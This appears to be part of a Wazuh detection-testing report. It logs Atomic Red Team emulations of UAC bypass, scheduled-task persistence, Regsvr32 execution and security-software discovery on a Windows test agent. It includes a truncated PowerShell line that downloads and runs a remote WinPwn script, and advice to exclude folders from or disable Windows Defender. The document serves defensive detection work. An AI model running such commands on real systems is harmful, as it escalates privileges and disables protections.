UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
iex : At line:1 char:1
+ function dccuacbypass
+ ~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Exit code: 0
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Exit code: 0
Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Exit code: 0
Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Exit code: 0
Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-25 Disable UAC notification via registry keys
Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Clean-up on completion of the test

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```

Attack emulation with ART [Agent server 2022] 🟒

T1053.005 – Scheduled Task/Job

GetPrereqs

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
GetPrereq's for: T1053.005-1 Scheduled Task Startup Script
No Preqs Defined
GetPrereq's for: T1053.005-2 Scheduled task Local
No Preqs Defined
GetPrereq's for: T1053.005-3 Scheduled task Remote
No Preqs Defined
GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-5 Task Scheduler via VBA
Attempting to satisfy prereq: Microsoft Word must be installed
You will need to install Microsoft Word manually to meet this requirement
Failed to meet prereq: Microsoft Word must be installed
GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml)
Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml)
GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
No Preqs Defined
GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
GetPrereq's for: T1053.005-9 PowerShell Modify A Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
Attempting to satisfy prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Prereq successfully met: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Attempting to satisfy prereq: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"`
Prereq successfully met: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"`
```
Test run

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1053.005-1 Scheduled Task Startup Script
SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created.
SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created.
Exit code: 0
Done executing test: T1053.005-1 Scheduled Task Startup Script
Executing test: T1053.005-2 Scheduled task Local
SUCCESS: The scheduled task "spawn" has successfully been created.
Exit code: 0
Done executing test: T1053.005-2 Scheduled task Local
Executing test: T1053.005-3 Scheduled task Remote
ERROR: No mapping between account names and security IDs was done.
Exit code: 1
Done executing test: T1053.005-3 Scheduled task Remote
Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task

TaskPath TaskName   State
-------- --------   -----
\        AtomicTask Ready

Exit code: 0
Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing test: T1053.005-5 Task Scheduler via VBA
New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
At line:70 char:12
+ $app = New-Object -ComObject "$officeProduct.Application"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [New-Object], COMException
    + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand
New-Item : The registry key at the specified path does not exist.
At line:73 char:34
+ if (-not (Test-Path $key)) { New-Item $Key }
+                              ~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentException
    + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand
Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist.
At line:74 char:5
+ Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand
You cannot call a method on a null-valued expression.
At line:84 char:9
+ $doc = $app.Documents.Add()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:89 char:5
+ $comp = $doc.VBProject.VBComponents.Add(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:90 char:5
+ $comp.CodeModule.AddFromString($macroCode)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:91 char:5
+ $app.Run($sub)
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:92 char:5
+ $doc.Close(0)
+ ~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:93 char:5
+ $app.Quit()
+ ~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:94 char:5
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException
Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:95 char:5
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException
Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:96 char:5
+ [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NullReferenceException
Exit code: 0
Done executing test: T1053.005-5 Task Scheduler via VBA
Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task

cmdletOutput                                                    ReturnValue PSComputerName
------------                                                    ----------- --------------
MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\")           0

Exit code: 0
Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
The operation completed successfully.
SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created.
Exit code: 0
Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute

cmdletOutput                                                      ReturnValue PSComputerName
------------                                                      ----------- --------------
MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\")           0

Exit code: 0
Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Executing test: T1053.005-9 PowerShell Modify A Scheduled Task

TaskPath TaskName          State
-------- --------          -----
\        AtomicTaskModifed Ready
\        AtomicTaskModifed Ready

Exit code: 0
Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task
Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
The filename, directory name, or volume label syntax is incorrect.
Exit code: 1
Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
PS C:\Users\vagrant\Desktop>
```
Cleanup

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Done executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Executing cleanup for test: T1053.005-2 Scheduled task Local
Done executing cleanup for test: T1053.005-2 Scheduled task Local
Executing cleanup for test: T1053.005-3 Scheduled task Remote
Done executing cleanup for test: T1053.005-3 Scheduled task Remote
Executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Done executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Unregister-ScheduledTask : No MSFT_ScheduledTask objects found with property 'TaskName' equal to 'Run Notepad'. Verify the value of the property and retry.
At line:1 char:4
+ & {Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false}
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Run Notepad:String) [Unregister-ScheduledTask], CimJobException
    + FullyQualifiedErrorId : CmdletizationQuery_NotFound_TaskName,Unregister-ScheduledTask
Done executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Done executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Done executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Done executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Executing cleanup for test: T1053.005-9 PowerShell Modify A Scheduled Task
Done executing cleanup for test: T1053.005-9 PowerShell Modify A Scheduled Task
Executing cleanup for test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
The filename, directory name, or volume label syntax is incorrect.
Done executing cleanup for test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
```
Sysmon event log

![T1053Reg](https://github.com/wazuh/wazuh/assets/95248059/980b12c6-1055-444e-bec2-c24c2e346444)

Dashboard alert

![Screenshot from 2024-02-28 00-18-00](https://github.com/wazuh/wazuh/assets/95248059/b583cd23-6f91-4542-a112-c4239af406df)
![Screenshot from 2024-02-28 00-19-18](https://github.com/wazuh/wazuh/assets/95248059/b745c6c7-5cf3-4f8b-925a-47961fb50c7c)

T1218.010 – Signed Binary Proxy Execution: Regsvr32

GetPrereqs

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution
Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
Prereq already met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution
No Preqs Defined
GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL
Attempting to satisfy prereq: Test requires a renamed dll file
        1 file(s) copied.
Prereq successfully met: Test requires a renamed dll file
GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
```
Test run

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Exit code: 5
Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception
Exit code:
Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing test: T1218.010-3 Regsvr32 local DLL execution
Exit code: 0
Done executing test: T1218.010-3 Regsvr32 local DLL execution
Executing test: T1218.010-4 Regsvr32 Registering Non DLL
Exit code: 0
Done executing test: T1218.010-4 Regsvr32 Registering Non DLL
Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Exit code: 0
Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
```
Cleanup

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
```
Sysmon event log

![T1218 010Reg](https://github.com/wazuh/wazuh/assets/95248059/45082adc-7c1b-43f0-a3a8-7e84df144792)
Dashboard event
![Screenshot from 2024-02-28 00-53-07](https://github.com/wazuh/wazuh/assets/95248059/c572b38c-b030-4ab5-ba75-571273031f7d) ![Screenshot from 2024-02-28 00-53-34](https://github.com/wazuh/wazuh/assets/95248059/a6ad58f5-173e-4e48-b3dd-df330aeb3344)

T1518.001 – Software Discovery: Security Software Discovery

GetPrereqs

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1518.001 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1518.001-1 Security Software Discovery
No Preqs Defined
GetPrereq's for: T1518.001-2 Security Software Discovery - powershell
No Preqs Defined
GetPrereq's for: T1518.001-6 Security Software Discovery - Sysmon Service
No Preqs Defined
GetPrereq's for: T1518.001-7 Security Software Discovery - AV Discovery via WMI
No Preqs Defined
GetPrereq's for: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
No Preqs Defined
GetPrereq's for: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
No Preqs Defined
GetPrereq's for: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
No Preqs Defined
PS C:\Users\vagrant\Desktop>
```
Test run OutputFile.log
Cleanup

```console
PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1518.001 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1518.001-1 Security Software Discovery
Done executing cleanup for test: T1518.001-1 Security Software Discovery
Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service
Done executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service
Executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI
Done executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI
Executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
Done executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
Executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
Done executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration
Executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
Done executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration
```
Sysmon event log

![T1518 001Reg](https://github.com/wazuh/wazuh/assets/95248059/c0e199a5-c59a-4372-a839-4399118a39e2)

Dashboard event

![Screenshot from 2024-02-28 00-53-53](https://github.com/wazuh/wazuh/assets/95248059/dbf0872e-4856-42f1-8c3b-de6de2c285a6)
![Screenshot from 2024-02-28 00-54-01](https://github.com/wazuh/wazuh/assets/95248059/7c0c6439-e5af-450c-9ee2-536c5d6dc07f)

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

GetPrereqs

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites met: T1548.002-10 UACME Bypass Method 23
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites met: T1548.002-11 UACME Bypass Method 31
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites met: T1548.002-12 UACME Bypass Method 33
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites met: T1548.002-13 UACME Bypass Method 34
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites met: T1548.002-14 UACME Bypass Method 39
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites met: T1548.002-15 UACME Bypass Method 56
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites met: T1548.002-16 UACME Bypass Method 59
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites met: T1548.002-17 UACME Bypass Method 61
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification
CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys
Prerequisites met: T1548.002-25 Disable UAC notification via registry keys
CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Test run

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout
The operation completed successfully.
(c) Microsoft Corporation. All rights reserved.
Microsoft Windows [Version 10.0.20348.2322]
C:\Users\vagrant\AppData\Local\Temp>
Exit code: 0
Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open

Name                           Property
----                           --------
command

Exit code: 0
Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing test: T1548.002-3 Bypass UAC using Fodhelper
The operation completed successfully.
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-3 Bypass UAC using Fodhelper
Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName     : command
PSDrive         : HKCU
